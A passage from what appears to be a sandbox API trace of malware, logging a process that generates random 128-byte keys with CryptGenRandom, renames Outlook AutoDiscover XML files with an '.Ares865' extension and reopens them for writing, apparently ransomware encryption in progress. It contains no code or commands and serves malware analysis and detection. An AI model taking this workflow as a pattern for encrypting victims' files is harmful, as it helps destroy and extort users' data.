dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0069.781] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0069.781] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0069.781] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.781] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.784] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0069.784] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.784] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.785] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PRODIGY.NET.XML.Ares865") returned 86 [0069.785] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PRODIGY.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\prodigy.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PRODIGY.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\prodigy.net.xml.ares865"), dwFlags=0x1) returned 1 [0069.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PRODIGY.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\prodigy.net.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0069.786] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0069.786] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0069.787] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.787] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.791] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0069.791] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.792] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.792] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\ROGERS.COM.XML.Ares865") returned 85 [0069.792] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\ROGERS.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\rogers.com.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\ROGERS.COM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\rogers.com.xml.ares865"), dwFlags=0x1) returned 1 [0069.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\ROGERS.COM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\rogers.com.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0069.793] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=818) returned 1 [0069.793] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0069.794] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.794] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.796] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0069.797] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.797] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.797] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SBCGLOBAL.NET.XML.Ares865") returned 88 [0069.797] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SBCGLOBAL.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\sbcglobal.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SBCGLOBAL.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\sbcglobal.net.xml.ares865"), dwFlags=0x1) returned 1 [0069.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SBCGLOBAL.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\sbcglobal.net.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0069.799] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=816) returned 1 [0069.799] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0069.800] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.800] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.804] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.805] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.805] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.805] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SNET.NET.XML.Ares865") returned 83 [0069.805] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SNET.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\snet.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SNET.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\snet.net.xml.ares865"), dwFlags=0x1) returned 1 [0069.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SNET.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\snet.net.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0069.807] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=806) returned 1 [0069.807] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.808] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.808] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.810] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.810] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.810] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.811] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SWBELL.NET.XML.Ares865") returned 85 [0069.811] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SWBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\swbell.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SWBELL.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\swbell.net.xml.ares865"), dwFlags=0x1) returned 1 [0069.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SWBELL.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\swbell.net.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0069.813] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=810) returned 1 [0069.814] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.814] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.814] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.817] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.818] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.818] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.819] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\TALK21.COM.XML.Ares865") returned 85 [0069.819] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\TALK21.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\talk21.com.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\TALK21.COM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\talk21.com.xml.ares865"), dwFlags=0x1) returned 1 [0069.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\TALK21.COM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\talk21.com.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.820] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=807) returned 1 [0069.820] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.821] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.821] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.823] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.824] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.824] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.824] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\WANS.NET.XML.Ares865") returned 83 [0069.824] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\WANS.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\wans.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\WANS.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\wans.net.xml.ares865"), dwFlags=0x1) returned 1 [0069.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\WANS.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\wans.net.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.826] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=806) returned 1 [0069.826] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.826] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.826] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.829] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.830] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.830] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.830] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CA.XML.Ares865") returned 83 [0069.830] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CA.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ca.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CA.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ca.xml.ares865"), dwFlags=0x1) returned 1 [0069.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CA.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ca.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.834] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=804) returned 1 [0069.834] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.835] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.835] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.854] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.854] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.854] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.855] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.ID.XML.Ares865") returned 86 [0069.855] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.ID.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.id.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.ID.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.id.xml.ares865"), dwFlags=0x1) returned 1 [0069.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.ID.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.id.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.856] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=810) returned 1 [0069.856] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.857] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.857] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.859] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.860] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.860] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.860] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.IN.XML.Ares865") returned 86 [0069.861] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.IN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.in.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.IN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.in.xml.ares865"), dwFlags=0x1) returned 1 [0069.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.IN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.in.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.862] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=810) returned 1 [0069.862] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.863] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.863] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.866] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.867] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.867] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.867] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.JP.XML.Ares865") returned 86 [0069.868] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.JP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.jp.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.JP.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.jp.xml.ares865"), dwFlags=0x1) returned 1 [0069.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.JP.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.jp.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.873] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=811) returned 1 [0069.873] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.874] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.874] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.887] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.888] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.888] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.889] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.KR.XML.Ares865") returned 86 [0069.889] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.KR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.kr.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.KR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.kr.xml.ares865"), dwFlags=0x1) returned 1 [0069.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.KR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.kr.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.890] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=806) returned 1 [0069.890] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.891] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.891] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.893] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.894] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.894] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.894] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.NZ.XML.Ares865") returned 86 [0069.894] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.NZ.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.nz.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.NZ.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.nz.xml.ares865"), dwFlags=0x1) returned 1 [0069.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.NZ.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.nz.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.895] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0069.895] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.896] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.896] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.899] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.899] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.899] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.900] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.TH.XML.Ares865") returned 86 [0069.900] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.TH.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.th.xml"), lpNewFileName="C:\\Program Files\\Microsoft 